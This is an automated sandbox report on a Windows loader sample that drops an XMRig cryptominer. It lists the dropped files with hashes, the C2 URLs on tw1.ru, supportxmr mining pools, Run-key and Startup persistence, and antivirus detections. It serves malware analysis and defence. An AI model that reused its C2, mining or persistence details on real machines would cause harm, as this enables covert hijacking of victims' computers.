37->72 dropped 105 Multi AV Scanner detection for dropped file 37->105 107 Found strings related to Crypto-Mining 37->107 53 yondex.exe 15 6 37->53         started        signatures11 process12 dnsIp13 88 cv99160.tw1.ru 92.53.96.121, 443, 49731, 49733 TIMEWEB-ASRU Russian Federation 53->88 74 C:\Users\user\AppData\...\yondex.exe (copy), PE32 53->74 dropped 76 C:\Users\user\AppData\Roaming\...\Driver.exe, MS-DOS 53->76 dropped 78 C:\Users\user\AppData\Roaming\...\Driver.url, MS 53->78 dropped 109 Antivirus detection for dropped file 53->109 111 Multi AV Scanner detection for dropped file 53->111 113 Machine Learning detection for dropped file 53->113 58 Driver.exe 1 53->58         started        61 Driver.exe 1 53->61         started        file14 signatures15 process16 dnsIp17 115 Multi AV Scanner detection for dropped file 58->115 117 Detected unpacking (changes PE section rights) 58->117 119 Found strings related to Crypto-Mining 58->119 64 conhost.exe 58->64         started        66 WerFault.exe 2 58->66         started        95 pool-fr.supportxmr.com 141.94.96.144, 3333, 49732, 49797 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 61->95 68 conhost.exe 61->68         started        70 WerFault.exe 61->70         started        signatures18 121 Detected Stratum mining protocol 95->121 process19

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  h2UFp4aCRq.exe39%ReversingLabsWin64.Trojan.Smokeloader
                  h2UFp4aCRq.exe56%VirustotalBrowse

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe100%AviraTR/ATRAPS.Gen
                  C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe8%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe14%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe67%VirustotalBrowse
                  C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe61%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                  C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe68%VirustotalBrowse
                  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe (copy)67%VirustotalBrowse

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  pool-fr.supportxmr.com4%VirustotalBrowse
                  cv99160.tw1.ru2%VirustotalBrowse
                  pool.supportxmr.com9%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://cv99160.tw1.ru/cmd.php?timeout=10%Avira URL Cloudsafe
                  https://cv99160.tw1.ru/cmd.php?hwid=B81A46090%Avira URL Cloudsafe
                  http://cv99160.tw1.rud0%Avira URL Cloudsafe
                  https://cv99160.tw0%Avira URL Cloudsafe
                  https://cv99160.tw1.ru/cmd.php?tim0%Avira URL Cloudsafe
                  https://xmrig.com/wizard%s0%Avira URL Cloudsafe
                  https://cv99160.tw1.ru/cmd.php?hwid=B8dv0%Avira URL Cloudsafe
                  https://cv99160.tw0%VirustotalBrowse
                  https://cv99160.tw1.ru0%Avira URL Cloudsafe
                  https://xmrig.com/docs/algorithms0%Avira URL Cloudsafe
                  https://cv99160.tw1.ru/cmd.php?hwid=B81A4609d0%Avira URL Cloudsafe
                  http://cv99160.tw1.ru0%Avira URL Cloudsafe
                  https://xmrig.com/wizard%s0%VirustotalBrowse
                  https://xmrig.com/wizard0%Avira URL Cloudsafe
                  https://cv99160.tw1.ru/cmd.php2%VirustotalBrowse
                  https://xmrig.com/docs/algorithms2%VirustotalBrowse
                  https://xmrig.com/wizard1%VirustotalBrowse
                  https://cv99160.tw1.ru2%VirustotalBrowse
                  http://cv99160.tw1.ru2%VirustotalBrowse
                  https://cv99160.tw1.ru/cmd.php0%Avira URL Cloudsafe
                  https://cv99160.tw1.ru/cmd.php?hwid=B8dJ0%Avira URL Cloudsafe
                  https://cv99160.tw1.ru/cmd.php1pool.supportxmr.com:33330%Avira URL Cloudsafe
                  https://cv99160.tw1.ru/cmd.php?timeout=1d0%Avira URL Cloudsafe
                  https://cv99160.tw1.ru/cmd.php1pool.supportxmr.com:33332%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  pool-fr.supportxmr.com
                  		141.94.96.144
                  		truetrueunknown
                  cv99160.tw1.ru
                  		92.53.96.121
                  		truetrueunknown
                  pool.supportxmr.com
                  		unknown
                  		unknowntrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://cv99160.tw1.ru/cmd.php?hwid=B81A4609false
                  • Avira URL Cloud: safe
                  		unknown
                  https://cv99160.tw1.ru/cmd.php?timeout=1false
                  • Avira URL Cloud: safe
                  		unknown
                  https://cv99160.tw1.ru/cmd.phptrue
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://cv99160.tw1.ru/cmd.php?timyondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://cv99160.tw1.rudyondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000335D000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cv99160.twyondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://xmrig.com/wizard%sDriver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cv99160.tw1.ru/cmd.php?hwid=B8dvyondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cv99160.tw1.ruyondex.exe, 00000004.00000002.1885179373.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002711000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003357000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003061000.00000004.00000800.00020000.00000000.sdmptrue
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://xmrig.com/docs/algorithmsDriver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmpfalse
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://cv99160.tw1.ruyondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000351B000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.000000000335D000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.00000000034E5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cv99160.tw1.ru/cmd.php?hwid=B81A4609dyondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000004.00000002.1885179373.0000000002FF4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://xmrig.com/wizardDriver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameyondex.exe, 00000004.00000002.1885179373.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 0000000C.00000002.2001171944.0000000002711000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cv99160.tw1.ru/cmd.php?hwid=B8dJyondex.exe, 0000000C.00000002.2001171944.0000000002A9C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cv99160.tw1.ru/cmd.php?timeout=1dyondex.exe, 00000004.00000002.1885179373.0000000003171000.00000004.00000800.00020000.00000000.sdmp, yondex.exe, 00000010.00000002.2089679818.0000000003357000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cv99160.tw1.ru/cmd.php1pool.supportxmr.com:3333rolex.exe, 00000003.00000003.1726307942.000001FEAC072000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000692000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.drtrue
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  141.94.96.195
                  		unknownGermany
                  		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue
                  92.53.96.121
                  		cv99160.tw1.ruRussian Federation
                  		9123TIMEWEB-ASRUtrue
                  141.94.96.71
                  		unknownGermany
                  		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue
                  141.94.96.144
                  		pool-fr.supportxmr.comGermany
                  		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1461232
                  Start date and time:2024-06-23 11:30:06 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 10m 28s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:31
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:h2UFp4aCRq.exe
                  renamed because original name is a hash value
                  Original Sample Name:1fecbc51b5620e578c48a12ebeb19bc2.exe
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.mine.winEXE@43/6@2/4
                  EGA Information:
                  • Successful, ratio: 83.3%
                  HCA Information:
                  • Successful, ratio: 84%
                  • Number of executed functions: 140
                  • Number of non-executed functions: 111
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  05:31:02API Interceptor1x Sleep call for process: h2UFp4aCRq.exe modified
                  05:31:11API Interceptor10540x Sleep call for process: yondex.exe modified
                  10:31:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                  10:31:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                  10:31:27AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  141.94.96.195http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                  • pool.supportxmr.com/favicon.ico
                  92.53.96.121http://ct31152.tw1.ru/Get hashmaliciousUnknownBrowse
                  • ct31152.tw1.ru/data/logo.svg
                  http://cb00287.tw1.ru/Get hashmaliciousUnknownBrowse
                  • cb00287.tw1.ru/data/logo.svg
                  http://cv59800.tw1.ru/Get hashmaliciousUnknownBrowse
                  • cv59800.tw1.ru/data/logo.svg
                  141.94.96.71http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                    http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                      01904399.dat.exeGet hashmaliciousLoaderBot, XmrigBrowse
                        file.exeGet hashmaliciousXmrigBrowse
                          file.exeGet hashmaliciousXmrigBrowse
                            KMSPicoSetup.exeGet hashmaliciousXmrigBrowse
                              target.ps1Get hashmaliciousXmrigBrowse
                                file.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                  file.exeGet hashmaliciousRHADAMANTHYS, Vidar, XmrigBrowse
                                    file.exeGet hashmaliciousPrivateLoader, RHADAMANTHYS, XmrigBrowse
                                      141.94.96.144curriculum_vitae-copie.vbsGet hashmaliciousXmrigBrowse
                                        curriculum_vitae-copie_(1).vbsGet hashmaliciousXmrigBrowse
                                          curriculum_vitae-copie.vbsGet hashmaliciousXmrigBrowse
                                            Vsob3IooE7.exeGet hashmaliciousXmrigBrowse
                                              GameBar.exeGet hashmaliciousXmrigBrowse
                                                FTrondtloadws.exeGet hashmaliciousXmrigBrowse
                                                  file.exeGet hashmaliciousXmrigBrowse
                                                    GoogleUpdate.exeGet hashmaliciousXmrigBrowse
                                                      d.pyGet hashmaliciousPwnRig MinerBrowse
                                                        PYnsVrS3EX.exeGet hashmaliciousXmrigBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          pool-fr.supportxmr.comsetup.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                                                          • 141.94.96.71
                                                          SecuriteInfo.com.Win32.Evo-gen.18867.15916.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.71
                                                          http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                                                          • 141.94.96.71
                                                          http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                                                          • 141.94.96.195
                                                          file.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                          • 141.94.96.195
                                                          setup.EXE.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.195
                                                          updater.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.71
                                                          iHcQJBquIc.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.195
                                                          01904399.dat.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                          • 141.94.96.195
                                                          Vsob3IooE7.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.144

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          DFNVereinzurFoerderungeinesDeutschenForschungsnetzesearm7-20240623-0650.elfGet hashmaliciousMiraiBrowse
                                                          • 141.27.32.118
                                                          BKCtdl2mim.exeGet hashmaliciousRemcosBrowse
                                                          • 141.95.84.40
                                                          https://houkht.za.com/Get hashmaliciousUnknownBrowse
                                                          • 141.95.85.198
                                                          SecuriteInfo.com.Win32.Evo-gen.18867.15916.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.195
                                                          https://www.mediafire.com/file/jvu61qs0cfxx045/LNK+Exploit+MONSTERMC.zip/fileGet hashmaliciousUnknownBrowse
                                                          • 141.95.171.142
                                                          CB8drrx7FQ.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 134.96.172.206
                                                          http://tinyurI.com/bn229tanGet hashmaliciousUnknownBrowse
                                                          • 141.95.33.120
                                                          3RzVV7rQr8.elfGet hashmaliciousMiraiBrowse
                                                          • 137.252.83.120
                                                          6vokwEQb7K.elfGet hashmaliciousMiraiBrowse
                                                          • 141.76.203.186
                                                          https://riprogramma.consegna.3-76-125-238.cprapid.com/dpd/update.phpGet hashmaliciousUnknownBrowse
                                                          • 141.95.171.140
                                                          DFNVereinzurFoerderungeinesDeutschenForschungsnetzesearm7-20240623-0650.elfGet hashmaliciousMiraiBrowse
                                                          • 141.27.32.118
                                                          BKCtdl2mim.exeGet hashmaliciousRemcosBrowse
                                                          • 141.95.84.40
                                                          https://houkht.za.com/Get hashmaliciousUnknownBrowse
                                                          • 141.95.85.198
                                                          SecuriteInfo.com.Win32.Evo-gen.18867.15916.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.195
                                                          https://www.mediafire.com/file/jvu61qs0cfxx045/LNK+Exploit+MONSTERMC.zip/fileGet hashmaliciousUnknownBrowse
                                                          • 141.95.171.142
                                                          CB8drrx7FQ.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 134.96.172.206
                                                          http://tinyurI.com/bn229tanGet hashmaliciousUnknownBrowse
                                                          • 141.95.33.120
                                                          3RzVV7rQr8.elfGet hashmaliciousMiraiBrowse
                                                          • 137.252.83.120
                                                          6vokwEQb7K.elfGet hashmaliciousMiraiBrowse
                                                          • 141.76.203.186
                                                          https://riprogramma.consegna.3-76-125-238.cprapid.com/dpd/update.phpGet hashmaliciousUnknownBrowse
                                                          • 141.95.171.140
                                                          DFNVereinzurFoerderungeinesDeutschenForschungsnetzesearm7-20240623-0650.elfGet hashmaliciousMiraiBrowse
                                                          • 141.27.32.118
                                                          BKCtdl2mim.exeGet hashmaliciousRemcosBrowse
                                                          • 141.95.84.40
                                                          https://houkht.za.com/Get hashmaliciousUnknownBrowse
                                                          • 141.95.85.198
                                                          SecuriteInfo.com.Win32.Evo-gen.18867.15916.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.195
                                                          https://www.mediafire.com/file/jvu61qs0cfxx045/LNK+Exploit+MONSTERMC.zip/fileGet hashmaliciousUnknownBrowse
                                                          • 141.95.171.142
                                                          CB8drrx7FQ.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 134.96.172.206
                                                          http://tinyurI.com/bn229tanGet hashmaliciousUnknownBrowse
                                                          • 141.95.33.120
                                                          3RzVV7rQr8.elfGet hashmaliciousMiraiBrowse
                                                          • 137.252.83.120
                                                          6vokwEQb7K.elfGet hashmaliciousMiraiBrowse
                                                          • 141.76.203.186
                                                          https://riprogramma.consegna.3-76-125-238.cprapid.com/dpd/update.phpGet hashmaliciousUnknownBrowse
                                                          • 141.95.171.140
                                                          TIMEWEB-ASRUbFZYRLnRIz.exeGet hashmaliciousLummaC, DCRat, LummaC StealerBrowse
                                                          • 92.53.96.121
                                                          http://ct31152.tw1.ru/Get hashmaliciousUnknownBrowse
                                                          • 92.53.96.121
                                                          http://cb00287.tw1.ru/Get hashmaliciousUnknownBrowse
                                                          • 92.53.96.121
                                                          http://cv59800.tw1.ru/Get hashmaliciousUnknownBrowse
                                                          • 92.53.96.121
                                                          e64Gs23hN2.exeGet hashmaliciousDCRatBrowse
                                                          • 92.53.96.121
                                                          https://e-obmen24.com/Get hashmaliciousUnknownBrowse
                                                          • 92.53.96.128
                                                          R2KymBQ7YS.exeGet hashmaliciousDCRatBrowse
                                                          • 92.53.96.121
                                                          https://cs13786.tw1.ru/Get hashmaliciousUnknownBrowse
                                                          • 92.53.96.121
                                                          http://cf20871.tw1.ru/Get hashmaliciousUnknownBrowse
                                                          • 185.114.247.232
                                                          ebalcao_odqz.vbsGet hashmaliciousUnknownBrowse
                                                          • 92.53.116.138

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0eStand.Launchpad.exeGet hashmaliciousUnknownBrowse
                                                          • 92.53.96.121
                                                          Stand.Launchpad.exeGet hashmaliciousUnknownBrowse
                                                          • 92.53.96.121
                                                          bFZYRLnRIz.exeGet hashmaliciousLummaC, DCRat, LummaC StealerBrowse
                                                          • 92.53.96.121
                                                          SecuriteInfo.com.Win64.TrojanX-gen.14485.639.exeGet hashmaliciousUnknownBrowse
                                                          • 92.53.96.121
                                                          SecuriteInfo.com.Win64.TrojanX-gen.14485.639.exeGet hashmaliciousUnknownBrowse
                                                          • 92.53.96.121
                                                          https://didianeensing-fft-oshehun.pages.dev/help/contact/897378126380120Get hashmaliciousUnknownBrowse
                                                          • 92.53.96.121
                                                          https://eugeniewun72-englichs302.pages.dev/help/contact/337110003119106Get hashmaliciousUnknownBrowse
                                                          • 92.53.96.121
                                                          https://sahilsendre.github.io/NETFLIX_CLONE_HTML_CSS_ONLYGet hashmaliciousUnknownBrowse
                                                          • 92.53.96.121
                                                          https://higorgoltara.github.io/dio-instagram/indexGet hashmaliciousUnknownBrowse
                                                          • 92.53.96.121
                                                          https://amazon-us.kcloudx.workers.dev/ref=cs_503_linkGet hashmaliciousUnknownBrowse
                                                          • 92.53.96.121

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\user\AppData\Roaming\Sysfiles\Driver.exefile.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                            W1nnerFree CS2.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                              KRZyX0PPRm.exeGet hashmaliciousXmrigBrowse
                                                                lO188m2RAu.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                                  file.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                                    01904399.dat.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                                      Vsob3IooE7.exeGet hashmaliciousXmrigBrowse
                                                                        ruZVRNvu0Y.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                                          file.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                                            WvWlWr2HC0.exeGet hashmaliciousLoaderBot, RedLine, SmokeLoader, Vidar, Xmrig, zgRATBrowse

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\h2UFp4aCRq.exe
                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):36
                                                                              Entropy (8bit):4.194385682587763
                                                                              Encrypted:false
                                                                              SSDEEP:3:mKDDFRK9NyVXMMH:hBVc2
                                                                              MD5:CE32EEA7C273547D3FB75F8E4191E25A
                                                                              SHA1:07D0EDD1F64C799B01DA4E670126B4B2C5091DDE
                                                                              SHA-256:940D3C2D3A6665D5017C0BF64120A71B2CE61106AE015399282AE8F4656CB91F
                                                                              SHA-512:56DA0BE9E79B98FB276A6D5A26B2FE06035D46E299FC6E6CB4E04BB396D119204881518E93F2184A68AA34FF024F81281F131FF0F98CF39541CF857C96DA95D4
                                                                              Malicious:false
                                                                              Preview:@echo off..start rolex.exe -priverdD

                                                                              C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\h2UFp4aCRq.exe
                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4605877
                                                                              Entropy (8bit):7.962365224089739
                                                                              Encrypted:false
                                                                              SSDEEP:98304:ZqwfM8jZlts7Dnfg+u5NIg1GbnBH9Ltl4NFA0kA8X1KpWQMt:Zqw0v7DnZu5NnobnDtl4TjZ8X1/QK
                                                                              MD5:8866D677A3309A0AD903F37557C5941B
                                                                              SHA1:2B03D0C6CB74DEFEDFC31154C57B073C889EA11A
                                                                              SHA-256:ECBCCACD00CDF38870BEA7D203909DA1EA2261477125FF7E0BDCEF5F3FC4D17D
                                                                              SHA-512:15535E08A5E224941610C90F0BA3921BB3A1911380889D393AEDBC2E4806910171C81005CDA27D23466292DAEC606ABCB94D0FBF546430D70EA21DE15CFE406E
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                              • Antivirus: Virustotal, Detection: 14%, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...#.@f.........."....!.h...j.................@..........................................`.............................................4......P...............l0..............p....6..T....................7..(......@....................... ....................text...ng.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc...............................@..@.reloc..p...........................@..B........................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4157440
                                                                              Entropy (8bit):5.213682809026485
                                                                              Encrypted:false
                                                                              SSDEEP:49152:GBNDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3:GnzP88fBsnZTgOtqB3m1RC3
                                                                              MD5:BD2413C32E34D0031F7881D51AE731FF
                                                                              SHA1:8771733C460F22ADC0E1865F0B3F2AC19E9C1001
                                                                              SHA-256:277E5A809506398685FE20BA674B7F3F75B2E04A34C2B150A84088B266138894
                                                                              SHA-512:612C8B9F86308B13342CEF00B9166084BF36F44ADDD139A0123F84CF9711FB2F03E15E4A0B3D95A6DEAAFB60BCA1CC1436514B2B96F4AAF18B094534C94974CF
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_LoaderBot, Description: Yara detected LoaderBot, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, Author: Joe Security
                                                                              • Rule: MALWARE_Win_CoinMiner04, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: Virustotal, Detection: 67%, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....uf..............0..f?.........z.?.. ....?...@.. ........................?...........`.................................(.?.O.....?.......................?.......?.............................................. ............... ..H............text....d?.. ...f?................. ..`.rsrc.........?......h?.............@..@.reloc........?......n?.............@..B................\.?.....H........4...............R...0?..........................................0..8........s.......s........o....o......o....(....&....,..o......*........%,.......0..L..........(......(....o......t&...r...po......o....o....s....o .......&........+..*........>?.......0...........~....r...p(....(!...(......,...%..|.o"......i.+............8................,...%..;.o".........r...po#...-.r...p+.r...p..................+...%....%.r...p.%....%.r...p.%....($.......&......X.....X......i?p..

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe
